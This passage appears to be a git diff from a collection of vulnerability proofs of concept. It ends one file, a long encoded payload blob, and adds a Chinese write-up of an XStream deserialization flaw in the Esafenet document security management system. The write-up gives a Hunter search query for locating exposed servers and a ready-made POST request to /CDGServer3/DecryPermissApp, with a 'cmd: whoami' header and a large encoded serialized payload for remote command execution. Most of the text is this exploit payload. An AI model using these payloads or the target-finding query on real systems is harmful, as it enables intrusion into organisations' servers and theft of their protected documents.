DBKLAJKPJFHOICCDFKJEDGGFDKPGJLKFJJJKCOANLNPDEJLHBBHJJGMNJPHFCHGINMJIMBDCBCDOHKDANDLFDOOCEADNHODFKGLBGAPAAONECAEACNDKGFGIMDAAKMLJJLAGKCJDECINGDJAHONECBMFDKMCKHOKADAPGBOKOGPEDFMHKFBDEBOMKNMELIALJHOHGOCAMKJCFECMNCODNHGIFBFIIJMPEHGNBDNGHICBLIGCOPDHENDDEODNJAJJFHNJIBJGJPFFKPBFOBDLLOIBAHALODFMHODOHOPGPMGLIPIJONOFCGMELPFMKMMCPFFNMILJFONAACCBCIJFCAFHOHLBALEIGHDPMMFMFIHKJBAGGGBDEDNCDHEJALEBDPIIEGCKGKMPLGKJGEJAJPMIFCDBAELNMDPNKFCAEGJCAFJPJBBMPLMEIGCNPOLIGHCLGMEJLKCHEPGBJCCDECFMKIBL
FIGOFEJKPGAHIGOHNOKMLOHLKDIPAPMFOPBHDBMAAEBEOKBEMEHIILJENNPKHJIMJMNLGHMAENHOHGMEFLKPJJBHDGLGAAMIGDMDCHBMICMDKNGPCOPEKDEMFLKINAMOKNDLDBABNGLFPJHFMKMBBCAEJDENPHGJGGPLMIIHHIAHGIBOINFBNCKJLJIGEPNAOGJFAFPDDBHEBCKNNJKJDLBPHHDNNCEDGAKHGOKPMCLOOPIHHNFMNFOILEAOIFGOJGPDCBLNGLEIOHHHAJPFPGLJNFFHKCNMFGHAHANBJLHJFNNLIBEIFKHJHMENIIOONPDMFOCPKEDHHMEPHAJKGALDFDBOFKBOCDDAFLJBDIENKOHGJPHGLOPDMIEPDBHBBEILLFPOAKJKJAPFKAOMLFOJBLAAEAIFLBOMGECGDBILGNGBEHDEOFLOLHJKAOJMJKNNLKNDHAPCKCHLAFHMCCLNNIIGJLDLCCOALPEPPNEBDNPGEMMPFFALFDONIGHJEMJGJGPLKDKMBGCLJEPLHDBOIKMNGELEKLJLFFAEEEDMBJFLJGGHMPHADEJEJLKJCMLNFIELFBOKAOPCIMCEBFNGMECGFAMMNOMCHKEIJGGNIHKPBFJLKODLLABGBJANDJFBJNBDHIDNGJGLAOFHGFBMJAFJNNLKNBAALOGIIHFMIOLDOEEFNNJDFLIMNBAHJGPJBDHIKGHCDMMLKFOHOJFLOLHHCEJACKLGHIBJHJHGMECCLNHBDGHFNPNOFEJKKOMEFONNBANBKOLDEMFCMDLNLGDBFEOIKAFJDAHAEJHMIJGJFAOJIHAIBHOOEMHHCOODAIEOEBFLMNAMDIIDLDHAIJDBKCMGKJFHHFKKGABCJCPHBBKDBPGLKFFFFOBLBHAPEELFFDEPOFFHIINLEMPICLDNGAEELNGONJIKOPFIJBJIPDGPLEDMHNJJHLBJDDGNDIHECEJNEFNLEHNHFCFOEEEGFIOKCPENDLNJJHGFJGAMNFLNFFIMPGKEMKKAMEPBAHBKBHGGIEANHFOKPEDDNLADKABNLJPONGDIGMCLENLOBAKMEPODENJNNDPEOCCLMLOJDJPPPMEFLBFLAIDHNCCHDDONIDPMKIOAGODDPKHDBGFCIGOAFLPBMELEPDHECABPOFMOKJECEHKIJIKHLCEFMAIGEKAALLCMMCDLPHELOCEDNIAIIHJCGFHJFBBKFKCFOBAABJEIMEIMDPEPCHKEBCEMIPECMAJGCEKHGOKOGFNHHFMKOICKKBKKKBDGDPCGLGMGALDDMEEFILPFOCFHFGIPOHKADHACFDJCGCKPANCHDAEDMNIEACGEECCNIBJGGIENIOENAFDBNMJCPJDDDKGDLKMCILLIEKBEDADHHCMONHBAABOGHMPNGHHEHIHCBBJJINCFFJKKEHMGJCPCNIMKCPGHBPIFADBGGBPCIMBDPENPCFFFPDGMKEBPFOOFFBHCKPAGHGJJELHDFJBCKLMAJDCJIIILHKBHJJMKOAOMLFOJBLAAEAIFLBOMGECGDBILGNGBELIMDAFIFCBLHDHLCJLMAHCOKGMKDCLKKOGKKNDDAHMGGIAKGHAHPNADHLLPPFDJILKFMIHHPIMLOGMDHPFJHPMGEBKHGHLFDKPIKNDKFLBNHOODBEAHNBBDBALEJGOLJHFPKEIHMLKAJHBNICKMPHFANCLPNFFLDDHEKKOLODMEJOIJGPDOPCGDPKLNDLPBHFGIMJCPMLPCPNPCJCKNJBCJOJIJCHDGIDIIJGKMKAICADENFOEEGHJNEHADCHNEMABINOIIGAGNGNPNCPALKIADLLJBEMOKJEGPNELELFGCIFOMAFBPCAKEDHIGLMFPFIHGLFPIHFAOFBEIIDHKDCGIGPNOICHCLEAKLHILHDCONAKMNHALCLFLNOBIMBCMKNGHPIHGDEIGGILLNIHDPACAJGHBEBEBMIDAOCAAKGMNBCBENBLGLLLOKMDMJANE
CALMLPLJNKGJKBLCIPBJBPMJOHNPOBPOBCGEMKBPJABNDBKCGAFALLDPJHHGMOGDJDNEKGJBMEIBPIJIOLDOPCEDKDPACBAAMDFLLJMFEGLKICDEMPCHMHIDFKFKDCMGGALJOLJEMCGHMKIMJPOEFPGECHMGBLGGGBJEHBDGGAJEALPEDHDGJPPFLLAHGGKAPCNJCIFBLMGGCKOJLHCHOIMMGEADLOPOPLIHPEPBAHNKNAKOFIMOBBJIBBHMFDNDAIIFMLPLABGGJEDHELLDPGHIGOECAEMDJBGHODPCNEDENIFPEHAMJDPDEMNJOACCBGPPEILNOKDFHCNGKANGBCDCDNGEIBMJODCBPJNGKLECPCHDHJEEDHNFJEKGLMAFKCMKAMJPDMJLBGLPEJLLHINCGOCOENMLDKLDLHIDAHBBINIEFLIFGBJGMGMDOJDLFNMAJDPIFGICFKKIECPIPHHBMAJJGNBPCKCOIMIOODGNDMKKMLKFIDHKBFGDHLGANLCJCDEMNPGCGPIPNEMIKDJJNKECHEJMCNAGDJNGIFFDPFGMAKLPLPLMOEDIEIOIIKMFLNDFDHCJHENMMAAJOFJLGDIAHBOCLMAGLPKKJAJGFPDCBJPGNAAMNGNNFDHDPIEHFFEPPJOMADEBHBIGFNOKHDKDNAIAAKLIGFNIFDKFMLJANODMADILHHONCGNLNJEKKAJHPMIDGHNJJOAGGFNKCOCONGBKNDNIJOLBGLGPLAKGCDIKIBNPMOACDBJLDLCNDCKFOJKINIIPBNBDHMNDEILFFCBIEMNMHCACEDFAHNMJLDEFGMJIINCJDNOHLDJIDOKKPCCENOHBDNMCGEHGENDBBBHFOFIAFGGCNKOKLMMCOOHNJEAJKILLKFJCEKEEDJHBGIMKLOEANBKMBFLDAGGOAIHNLDOPBPCHGNIDHGKFAMFGKBIIENFMJLHCGEMBKNJPMKDFCJCHFOLNOIPADHBEPLLHMNGEBMBHNLBHPIGHGPGKCPFOEGAHJKPIPGGMPIGNBDDIHKCLOFKIBBBHNPBNCLFGCHPOMIENELILEJPLKAHBJEPICAGJMNOAAOJLMPDBOOMEOFFAMKILAJANPCKENJMKLFKMBGOKBNKFGEGAEPEANNCIEENEBEBECBGLOKHEJCFCKABBAAMCDKCIMJLILOAEKHNKPCGOLDBBFFIGDHPDHOFNMLANMCHBIEHHIBHOPPLOFEGOAJLHCHPHGKLOCGJKKABNHLEHGKOINGEDMGDMCKKKLABBIOJCGANBDOCCELJCENBMIMBKCNJAEMBHLOJOGFLKJCNMEPJPKGKPHDGHIDCKAODGNNNCDKEDHLCIANLKENHMMDELDNBPNNNPHLGDDOLGDFPHOHFPBKMFEGOLFMMAFCNCDLMEKPKCDJNHIOJOOJADDHHHPPLGLMINICBIOEIALHBBCEGACCNDNOAPGNAGELEPGCBGLAEOPFGGIJBAKDFCPCCGJAHBDAJEPBCFMNJIKADAACMEFNBCBKICAALEICBCKEKHPCPDAKMDPGNCBBNKDFICFKKJEGOEJELPGLECFINPMBCCDLIGEJJALHPNHDAMIFEGJOCFGFDGBNJKHKAMOKOKKLIFIBAFAELPAPCHFFEOEBNFMLGPPMCDHDIIABOBFDCPFOMMNCJGJJFPGFHOKMAGCEOCKMJJPPAFBDLODOABMLPLAMCJIFGJNHALNOJMBLCFJFCDNCHLBGHLCAOICIJGDLGDMEKPHHMBOHAJJGMAIGLPIEIHHLKDOMBJMOPJIKBAKDHBBJLJJNPOHIDBAFAGMBLLPIEHENEMHNIFAGMMELMAJHCLFCDNFKHGEJFGGEIBKPFAFHFOFHGMCLLGCAJDGGJNKFBGDAAEAJNGEOJBBIFLLKNJIOJNHCFKPAPHGABENLMABGDMFOEEKIMHOBPCLPEAGNBFHEOMLGDDLDCODAJIEIPJNHJFDPHILIKHMHJHBJBLPNPPPJOJJBDJ
HCPOCLBIBBPJLLMNKIOKPHOFJKEJAMOBGCHOONMPJNEGDMNFPKMNOIOMJPEPDNKBODKFCDGJMGBCNHIGHFODOJAHDAFEDKOGGLMEJCOACLPIMCMPLDKDAPFJGGECGPNCEDGAEMJADOCGBEFIIPBMJMMMPNHNAKJOBMOIMMOMEBOBHPPIPAHJHKMJADIIDCIGOMDJBJHMHCGFJLELPFOMAFEAPHLHCCKKNNJMMLKIJEBGEBEDOOLIFHLKHCOONJMHCAFGOKNOAAKONAAPPMONFOJENLNEPGBJKLEHIGBDOAIDKAILCHIFPPGGFLGCPINADFPDCGMIHHIPHBCPIPHKGMGBPEICLDADONHGOFMMAMLAAHHMBIGNNOENIOJLMNGNMMKCNGEKEHLJHHCDFJKMDOGMOLHIEHDOCNBPILJOFBNCDONBOIHDDLALGCLOBNAFBDHNPEJJODIENCOCKHGOHOOLHFNDOFAEPCHOJNFJJNHKAIBGJEGDBHDFJGHGEPIAGPJBCCCAKMHIFDDNEDMCAOBCCGOHCMMADMKHCKIACBMGFKOGDNFGIGBJFFFKJFNIJAPHIMHKOLLIECAJFNFLJLLHEBIBLIOBOEIMNJMIJOCHEBEKPDJOCCMGGEOKGOMOFPKAICOHBGBOEFIIIAJKPEIIGBGLJCCAHJNKJFILFICJCPAICDGOBJIHMEOJHLCNJBDIEHHNDGKMKLLDLMAJLOHECBFJEOHKCABKIHGEBNMAGAODODMAOMOBILIIGCDKPJOKLAFLJLENBFFNNAKANMKNKNBNOJBKEKODPBIDDCELHBDDHCKEELKFLEHCNEFIAOJJHHHKIAGDJJGNKODKIGJAGBFEBMDEOMCHILDNFEEPFOGPPAHEHACDCHDOIDELKKBLAOJACMGMIDOJIJLPAOCLLIIFPLJDKCOEIOPBEAHBLGNHJHPLNMFFMKEHLOPIGNFNJNGIEPNELLHMIIGNPODEDCIHCIJBNMENKGFNOMILCBMELHLHNOBFLJHDIFLHPCKEAGJJNEAOBPNGKECFLDPPMCCLMNMHFICELDKEFNPMJHNGOKLOBHONELNCPLNDFKOIJONIBBBGABIANBIHHJDDLACPJEENOHCCDIJAPBKNNOECPIGOIMNMMPOGNCEOGDKNCCBHEEJCLEFMBEMEJICLGNHNIPEIOIAPKJDGOIKGEBGODFIGCHKCFFLPGFJBKDJOIMEJEHEEAOOJGLGKKDHGCIGFFOPILPFENMOKOMJLODFBNKOFEJKICAMBGPCPDNJOJDALNGCOFDAINHOAMCNLIIJEJENKBHFDAOFAAPJKBONHBMGGKAEMGHNJPCJFBDCKICEIELCGDJKIDFAKAFEHEBOMOBOGFDNEAANCAINACLGFMMFOMGCCBNLDCCPGLKNCABNEDFIGKDJHAEJIOOACADPENHDNOOKPILJCLNGMIIOPICHFPACILNJNAIEILINONKDMONACMLIKHOMPLHAODMDPFDNNKDMPMFEIMBOIMLOLCBBGOKONLDJCDDHGHIIIHDOLIJMGPFKMMPBDDPBIKJIBPKDNHOAHEFENPMKBLHOCDKLCKIMAOFHOEDNHKFNKKGHCICLAFKOBANHOIHACPLPLBCEJFONFMMGKINEPMEAANNFKCFODBDNAOIDMEFBLPBAIABHFJBNGMIKCJFGLPEHNDJHMGKFPPGEAFHEBFACNBIGGEIKCPBGIKHHNEAEMOAKKEMFKHDEBEGDDGJJLCIIICMNIDNMBIKHIDLJNCOHFENHIFNKJEECDNLHMPGPGMJMGJIJHDBFECNLMLFCLDFOMCFNBJELHJFFLDKGNOIHKEIFCBPOPCBGIJENFHKCNKOJMFBFIPFGBLFJCFPFNOCKGAADPFFEJFDNKGFMEILHBFMAFBMBOFNDGOMCGNIGJGOBPEOBPEKGPMMEMHLHMMCNDCDFPMACNDELNHGCALNPHHNFFLNAKEEEELCDLHDHBFOJBJFHBOJNB
GEOLIACBICKNMEEGPBEKIBEEMKGKLDAKAALKOBBJIGECCKHILNGKJLKGJBOPOFHCNHBKFPHLLLLMNNKPJADFGMCMPLILPCLOLJPOCIOOPOAPPMPFOEPNFGEEDALHLEIHJFAIHCFKLJKCBAABOIBBEAGAAPJJIHIHIACHLKBCPMEHCDGDPKPMALDBADOEKFMDFGAPPGNNJDAMPMNBAEHLLGIGCOLKJPGANBJODFEMFHHDAIMFNNIAEAKLKBBEEADPHIDIINDABGNKNOODAGKLPGAIOIFJLONMCNGOMOEALKIIJFLAHEDDNHDENODGINCAGDBFAAECFCNPBBOBBIALOHDOIOMMMJCAHMEFMAGNLALDIPAJPHLOKCHJGGLGEHFJKMDEAHEGABCCMCFOBFCMGGKGBCCBPJIJJNHNAPPECAPJEHMDMOLFIEOIFOFFGKCFCNFAKAPGBMEBJGIDLDBNHOLJGLOKOOKCNHGLNEGNBKHFDOJINFAPPKMMOJCOCENEHPCGDNKKOJFPBNFHIDDHFPHMCOAOKMOPHJNOJCFOJJGOOLNCKAHBFDPIDMJGKBHHEAIOKPJEAJJCNJFMMCKHJANGDEIHKHBAAFJCJGGECNBIBNLBLFMBGDJGHJDPMBIMPJLLBNNANCJJHBJBLEPGNIJOLGJLCGEJKNGBLDLGKMIOANJGGDPHHCGHLENGJHBANCELNLNNBADCDDCDOENGLFGIEBCMHPFBLOIDMDNBCAMFMCMMKCDKPOFBJFBGCMPOFAPCILIPFJDEDDAGKFMHBBEHIHOAGDKPONBOADJEIKKBPNBAPDNOEEEFONAMIFBLIHLLKOLEFHKPPKONJOCFHFOAPIJGMHKPHGIMBGOBOAOCGLMGDLIOPIJKFJIPCHAJEGJFCPOBLAEDFFGIMKEIPDBKNCKIHFHCIHDFACJMOGHMONMPPDKODNGCOBFMKBBMIEFGHOKOMDADNGANEMKDFLNMCABMOONIFKFEGDLJFAHLOODEBNBKFGPLANHIJFFDLBFJDCJHMPCPHBDPFICAJHCBBKLNLGEPHMCGKEKOLJBIIAMLMCFBIGACEHBBLHAIBBODKEDBPKPADPBJIKCGFCKDHPKCGELAMHIFEBBICMAGHPDCIIAJMBKCFMHJDHIPNNHFJILAIBPKKGLOEONLBLJGCIMHKAJCAHCNNDBDEJNDGFNMEJJECPFIONGEMLMOPEDNJDFBAHAEBOKMCNEMBEOMFIFCKLEKNLJOAINFFJLKPGPLHJMAOMLFLGDPBCIIPPPOHNMKOKPGEMFEOLDEHEJMPIOIAODDNJOFGLHNDAJICAOFOJKDDFBMMJJEIAPPNDBAKMJIIGNHJOPHKPINANLLLBBIGNIKKHDLKLJGOPKHGHICEACMCJNMMDJGBNACEOFNBDNKAKIOMHPECJEELPLNGPGMPHCOJGOFBENNNKIEKOJHKDAFGBAKHGILNJMMOKHDMIDIOGGKPFIFJOLIDDEGFCLKGNICGHJOINJCBOPOBKNAIDEEAGGLCMCEGPGEDPNFIKEADDPPINJIOMFKGCMJHDHLGMODMMGCNEIGNGGEMLLABHCCHGGDPGHJFBJMCCFGJCLCFCDJEBFMDMIEDBFJPKLONGIHJABFOGBAALJKCADCBOMDFAHLBPIJEFGLGOGPEAFAKFJCALDHMICDCIHPICLPEANCLCBKOIAMEHHLFIJHPEACFCPDDKCJHMNDBHEHLHBHHPEEACDMICBKGDHODHPCMLAMHOEJKAOODJCIPGMOCGPOAFJDDLGCENAKAFDBDEOKAGLBHJHEJEHCCJEFMIFNJDPDFNFFPAOLIHNFLJDDECGLCJNEEACCJDHPKOIJMOJOPDOKIGOPKMOHHPNOLCDHMOOFDKKBCBEPJPFJBDOEJBCODALFBPMGFPHEMFIBCBEMCANBOMOAKAIGFHJAKKGGAMDPDFMHEEDFHOHKABHBEJFEGAEIPMBPBIHIABBILCOGDCPKHJIP
BLCLJEENPKOJLHMALCEKELIPFFLJNNBINAPPOFHPEJDNNILKCEECPJIGJMKEJCNPEKJMDKPLLEHDDIGKKEDEPFHIJKKPNBBAJAMKNMNHIJFHBCKPKAKMAKCHMJJPFMFCFBKJMMEBABPCGCOCNKBJJPLMPHPJFLJLDABHNFFBOIGNCOFHBMFKCKMMENEJCPDOBPMAIDHBNKIAIGKAAHDCAIBLBKPNNLBNMEDCCOBGMDMAHJPPENANOCILDNELHNCIEAOMGKLMCLLEDDPNLDJNBFPEJOKCNNCJHKAPOCGFGENACAGBNBDEIAMGCCGKDNOLNKOCNMMABOMGGKGOFFOLKALPKFNMJJMEMMBBIAAFAAFPIBBDLOENGFIJJAFHNKKIDCGJNIGAFPCPDHPJAKCEKCCKDAIEDJCIJGMJJLEOEDELMJJMEJCCNEIMPDKIALLHFJNNGHOMIJIDPOCLOMECDFMEPAGLKNKEAPKHCBCFDINJHAGJAGPCGEJJEFAABLOEHMDIIGNKKDIILLFGPMBOIKEAAAJGPJHFGAFFPFEPKIKLKBMKLODNLBMFIEFPGAGFPCDCPJACDAEHCFOGEJHHLLBLBBDDOEEJJBPPHDCCOGPOPFOPCFJKBGCNCLLHNAJKIKLHKKIJLAIKBHCMBODNCPCLNHDLMHDPNKGIBANJJHCFLIMKPFOAIEDBDMIBEEPIHODEOLGAJHBNEOGCKIBMGIMJKLAOFAIACFJGOFEIBIOOPDCDCNFIOGCDKEGHEIAOBDCKLLGMEOEKIEHCEBFKAGOLFGCMNLNMJCNJMDBHMDPEGHHFKOJDDAPPHJMBLBDODOHKPNABBMBHMCCMKINKJLCIFBIPCENLPLOFOAJPEFHCDEOGLGFHNOBFFLHDMHNEFAIPMBJJMIIDAEAJAKGDIHIOIPIOPBJKOLEHJLBIOLGLBMHNCNDAHOGDOILIJANBPNLPPKCOKJFJPCLFJPGKDCBMGEOGGGANMMKDILOMJJLPKJJCOPFKPFAHNAIMDOKPCIKNEMFGMGCOGGMKBIBDEKDAKBPBJKPAFGODBFLGADBFNMDAHGLDGNFLLBONBDLAAOIIICMHIPDJCMHBGLFJAIMIBHABENMJOEHJLKGIIJDBBEHFJCHAPPIDAIAILKODLCALBBJNPCGLPKIEOLEOMKEMBLMLBEGKNGCOKOFIPBCFAAHGCIMCAKFFLFIBDHCDFHMKKNDHLCGIMMNKMGOPFDMJHCMOGLKPICOEEDDKPAHLEGOMDMDFLKFECCPILAKGLGDEMGMGEPODAGGJPPNDCHOBPHJKBDAKECOBIOJGKDMBKDBFPEGIGNOBDGELAENFFLCBKHHJADGFGCBAINLJPDMOBGLNNHAOBHGLGMMLDHGINFFOLLALGGAADPGMNJDMNOLKINDIKKIHJKDEKFAJDHPHNGAIBGNAODMICFEFCCHDPGMLJOGIJCIOOMMGEKPILGPFJOCMKILLFGPEAIBIDBGNPPDHLLAHMKLEJBJFBFPFBDNEJCNPK +``` + +![1706604015628-e224ba21-5cb3-40a0-bafa-0cf38e6ee1a8.png](./img/hzfoaEiaCAHdMefm/1706604015628-e224ba21-5cb3-40a0-bafa-0cf38e6ee1a8-466737.png) + + + +> 更新: 2024-04-20 22:01:34 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/tmuiit7o4r6wbx09> \ No newline at end of file diff --git a/亿赛通电子文档安全管理系统DecryPermissApp存在xstream反序列化漏洞.md b/亿赛通电子文档安全管理系统DecryPermissApp存在xstream反序列化漏洞.md new file mode 100644 index 0000000..4e7f06a --- /dev/null 
+++ b/亿赛通电子文档安全管理系统DecryPermissApp存在xstream反序列化漏洞.md 
@@ -0,0 +1,36 @@ +# 亿赛通电子文档安全管理系统DecryPermissApp存在xstream 反序列化漏洞 + +# 一、漏洞简介 + 亿赛通文档安全管理系统是国内最早基于文件过滤驱动技术的文档加解密产品,保护范围涵盖终端电脑(Windows、Mac、Linux系统平台)、智能终端(Android、IOS)及各类应用系统(OA、知识管理、文档管理、项目管理、PDM等)。亿赛通电子文档安全管理系统DecryPermissApp存在xstream 反序列化漏洞 + +# 二、影响版本 ++ 亿赛通电子文档安全管理系统 + +# 三、资产测绘 ++ hunter`app.name="ESAFENET 亿赛通文档安全管理系统"` ++ 登录页面 + +![1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6.png](./img/Fv6jdjorzsAlhpvz/1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6-150931.png) + +# 四、漏洞复现 +```plain +POST /CDGServer3/DecryPermissApp HTTP/1.1 +Accept: */* +User-Agent: Mozilla/5.0 +Connection: close +Accept-Encoding: gzip, deflate, br +Accept-Language: zh-CN,zh;q=0.8 +Content-Type: text/xml +Host: 192.168.110.187:8090 +cmd: whoami +Content-Length: 14756 + +NNLINELBIIKEOGPIFLNMHIPNNOHFNECLEHKBCIHIFHCMONPDPHOHMONIOCNLPBOKNAEEBHFCIFNMDPDAACABKCKIAEMBPOIBGPMNEIPJAOGBILDKMLDGAENLPAFBKFPFELKLGCEBMBMNKOIBMPHCIODCCEHOKPCEDHPNLONIODEGNCPIGDFMGMDPOMMEDIJNFKDCHHBFMFGBDOIOAHLOHNAMDBJABECIJOEHKAPJCBDIDJHKAMAGEELEHJEEIDBDILILANAKCIIGLMDIDDMOPNCNGLPPOMMIGCEFEBIMDHFAGLHIDHPJCHAEHFPHNHJGJKJDCINLAHOAPCDJNIABODKBFABJMFIEMLLPGGKNNNFCAOBHCOEOHCBFOFGBBPLKPHLLNOCJAKJDJPOEPBEKKPHOPBHFLJLNOGLABIJHIBOFFCPCLPAGLCEAONCAGIJFAEFOLKOLENHNFBOJIAOFJKBFMGNKBEECKKJPCECMFKPPPKEGOIOBHIBIBAGBIKAMOFLEKDKODMHGJOCEPEBNIHPFKEKKMCENNPHEODFNIOPMHFPPNFFIJEEJPPIMGPKHDOACKEEJACLCOKIPFHHECFDFJNMIFNGHLCOFLPDACOOALCNKBOEBPNPCKCKNJJJJANLFPKGLOINAIODAJNHAEDLBNONDJHPFELIJMNLMHEMBFGOHELCDBFHIFALDIIMBFEOHNHBOIOMLCJKCPHJPNDLPHDDCFJNMGKDMEINHIDLEGMOCNAFDAHOMPPIFFBPFCHAPPIDAIAILKODLCALBBJNPCGLPKIEOLEOMKEMBLMLBEGKNGCOKOFIPBCFAAHGCIMCAKFFLFIBDHCDFHMKKNDHLCGIMMNKMBJDGIDJMMGEOEGJNJDNNEKFDMEAHMILDKIFBGKGEJCMGOFEKGJEMNAFLDGEEOBKOHADBAMHBMDJOGIFPMDKIILIGAEELNEOAKNEFHDOGHOPBDICEALJIENFKHFCEHMPBJLCFPDHDGBBFIMKHLLFIHONFDJAIEJJLPPFMAEHBHDEBOIDLCMCIKAFBEBFEBGJEECDEINCPNPKIENONIMPBJCCMCHOAJHHDKDKEGJGDGJDJIDEHNNLNNHEONJEJHNLHLPMBBEJDLLJLLNPKIMGHLOFMMKBDEBHNFLPGEOKMHOFNBLLAALGMKNJONNGIOJLBFECJNLKHMBCKELDPBDMBFEHAKBHEMNDFBBEDCAMMHNNGMDGLNJHJD
AGPILNGBEDCDJBCJOAMOBIFLOFCFIJKDELPPFLFBOHHNIBEGOOFEFGAENOKBMPCBDELFJPAHICDPGANJALHFENMFHAJLNECAEGOGCBOIDLJENHCEDMAOEEOFKLDEBJEJOBCFLPEIEAGPOILBEGOKPOAAPGMICFMFLJNDMBGAJJPKNLIBOAABJLNADADNALIKHDJMDKGOPELEHGPDGNJHAAJKICHBFGMHCLEPFHCCKNFKPEOMHPLMOHBGDHCOGEIGPMIGLAHKBCEDHFGLDIKIIIMEPHMIMCIGJJDCKIEODLKCKOLAKBFHIBHOPNAMPEIKHCMDPNMLACKHOGJAEMBJPFEBOCPBGGAFGGNCOBEAIPANPLIBGDCCNMDNDNOIPOECCPELCEDPGCNJHEIOIFPJDKIFNJGHAHLHFNPICIJLHELMODMJIEGMMBNMMFBEJCDDDFOPAJOMBNKBDBGKKMLKCBBPFOOJCKFFIMLCODLOFNOIEHENLJNOFDAMKFLHIADBNGANHIANHOCHLILNJLOCOHFHMNFHALJHOPGKLOPHLMELJFBIABENFKEHCLIKMFGHPPJFIBBANPIOFKEEBIFIBDIIAIKENFILIDPDELJDMOPFKBOHPGLIPMNCFJFDCJGKCFOAJMPIIBEOHJPPNHLOCINIECHMJJMCKHICOMIMLHJAOJIGIFLMINANOFADOGDLLHCEKPECHDFBGIPEPNJBJOGLHDLKFLBFPLPFAENMMIFOMMNCJGJJFPGFHOKMAGCEOCKMJJPPAFBNEAKOAMMEHPGCBAJCHDBGJANBBHGIBMPHAMCEHEFLBAGOKDPKIPPDFLJIADKKOJPEPIGAKPCGKBNFBPLLKLEGBPJJCDJFGHDMLPNJBGFMLGMCABONHBLHPKHKEGJIBPFKCLMBIKKOMINPAJEPFHANBIBKMPHKEODCBMMIGAEFCENBNKDONGNLBADGDLJBMJGKEMNJOMPHDOPALIGEPCEDDAHJMNMJBFLIPBODEDCDAPMNGCANOCPLLMJOCPMPJDMEAMEPELICJKJLODAJEILBOJNFAJOFNOGCHGOJEGMGCPNCDEECKPAIAOHCLJBBFDKKAIHOJEKDBOFMFOBEDLNGJNIAJPLGMHBLHODIKDLEPOINDPDDIGKOLGEOBFFPMOHLBEALFIGAKNDKEKEJMJLNGHNANLCGLPNLBBFNKNEKCGBJKJDABFNAGPDILHBAAIECKBLKEDIJIMPJOMFLHBMOBLEKNEHINHAKBOHICLGBBPIEJIKALMIJHKHFIDNICAEEFPGGPBCBFPOJDFFKAGKAEOOCPMGCCMHPCIKHCODDCNGDDNDLAIMAPEMPNECNFPIALJELGOIHECEKHBHOHNIFCBJBFAOKKDCMNHHINAFGNECFPOGHBNMPJOECCFOCHICANBDOCCELJCENBMIMBKCNJAEMBHLOJOGALHGLLOEBFGFJAOFJHEGNLCEBCHGLNFEEIDOKIJNDHDANFPGLEMHOIJHOOJGKLGHBFBMBPBKEFOAKAIAGDMBLDEKLFKADKHNPAKBNPDKFIOAMAKKEHFNDABEPGKBMFCDFFOCIPDDEBOBFONDJFAJIJBAMGNBMCMJODGEGKIMIOLLAKMKJJAOCEMOBDCODALCKGKKKIADHOFMLNDGJBEMLLJPJOKPAIDACMPCOKAGKLIIMDENPNMEIBBMIFHGJKLKGPNOBJGMMLDKFKALLFHFDGDBDBMPOPDBLDNMAALEMAHGINFECKFHKJHFOCDJNBEDNGJCNENGIDHBJOLHEPFLEPHOOGJKFEGFLEMLGKDOOKIMAJIBJKOLAKCHBJJFDIGEMPABDNJFGMDAGEDIOHJKOAEHPLIBOFLIMFIEFOOGDHDNLCKOKPEDKEEBPAHKFMKBNNBAMICPOPLNPIGLMPDLAFBIEPHPJBFLBDECCPFINEBGMPMECAICGFLMJEKEIKDOKJMOAJLFNHHEHEPDAMFLNPKCDPODPLMFFAMIL
MAFIDBDJJOKIJKGJACMOMEHDDCJJAAOAFJDCCEFHKMJNDJEOLOOIHCFIILOIGCOPDHENDDEODNJAJJFHNJIBJGJPFFKEDPBJAKIPHPKELOMHNFABNMIMODOGPBOFLLPBGAHCEOBBFJLKNAMKACHIOMMFLAPFJCHBIJAAEJELEFFEIMAMCACJBBGADJDJKKEHMGJCPCNIMKCPGHBPIFADBGGBPCIKNBGDCJJCPMABJINOGLAPAHGLJLADBJKFLNAAFKFOBIJKCFIDEKNFGFCHDPGLKFDKPPHPNCFIGAMHBNHMLJAHOKKFLNOCNDNPPJJHBBKHDIIENFAGAHOMFPNNBGDLDEHLBDOKEOAEFPPCIEPGIOAHDEEMIKDPHBMADGLNILDCIEKELEBBEOBKLCDLKLKLLKHDHBHGDDLHOHGPPANCDABBHHBDOOLEOAKBKDBPGLKFFFFOBLBHAPEELFFDEPOFFHIGOGDKMBIAMJNNOOFGCNHBCCCFKCAOFDDDCBPLMMHGBLEDOPNEHBOECJGFMFOEIEIFAHLCOOAOLBFFKHAHIEMAEOBBPMBJNDMJJDMNJEMBGMNEPCFODGCOCKJICOBEGAFJKFADJOFMGPILCDMBFLLLAHEKPBCDJEBMHDLBLDLLCIAGNJJBFHFOIPLNNOFAFNOMFPBPNFLPLFFNNBBNEPBHBKJEOHBJPMOHHEKFHGACPFPDAHPCAPPGPKBJBGGNIPLOHFPAPHLHCJJHNGNKOMDMIECKACEPHCFJJAIPLCEOFNLBAFGFLBLNBPAHBOOJOKHIBAJFEAEKBNHHODNJNMEONLHDIPPCJJAEKOOELNHPDPAEPPBILHLHELMDHGPJMILIEOFJHBIJHAIPPKCIJKKANAAKEDNDAILJPGJLIBJMABMPDMHGPNALCCAIIAMJMFGJDOIPEFEBMMOBABIKBMMHMFHLBEFFLAGJLNMDEAOALFJGOGNFMFEFKPMNCNNEFMJNADLNIILEGKLOOHMBHPJJCNFBPKIKMAIEIANCNDLOODENILDEJELHACIBBOCINOOFNPMINIFDEFMPBNDMFGHJHNKCKDECBJIBFMIMBGFCIHDJAKCPNAPNMOIKJIDLPJCIKNOGJDBALIDJPCNICIAIPNGPCLDBGPIFLGDPNDOODLHJPLHFILLLKDJHHDIBODNIPFLCAKAFMGCAAMKOEOPLJAAAPDAHJAJHIHGPDFLNALHAPHIOBEDFICNIHJLFALHJKNLFLBKIHIFNAIIFBILLNOAIOKFMLEPDIKMHGNMDLKBIEGLFHDNPPDFPEDPGOLPICMJPOFEAJJMHGKPJEJNEMJGIPKBDHEGLILBLJIEICMNINFCHAOGJNMIHPAOJCCFNJHGJCJEMJJPCNFDKKGDJCDFBPGNKGDMPEBIIMLMBBAOGBOPAEFOMIHEJCKJGBLFFOGNGOFPPJEFNPLFPOGPICGIKMGPNIKNOELEMAGNHKHOIKAILJBMJJIPABBGPICCMPNFPHHFHKDAHJKBMAHDBKLAJKPJFHOICCDFKJEDGGFDKPGJLKFJJJKCOANLNPDEJLHBBHJJGMNJPHFCHGINMJIMBDCBCDOHKDANDLFDOOCEAD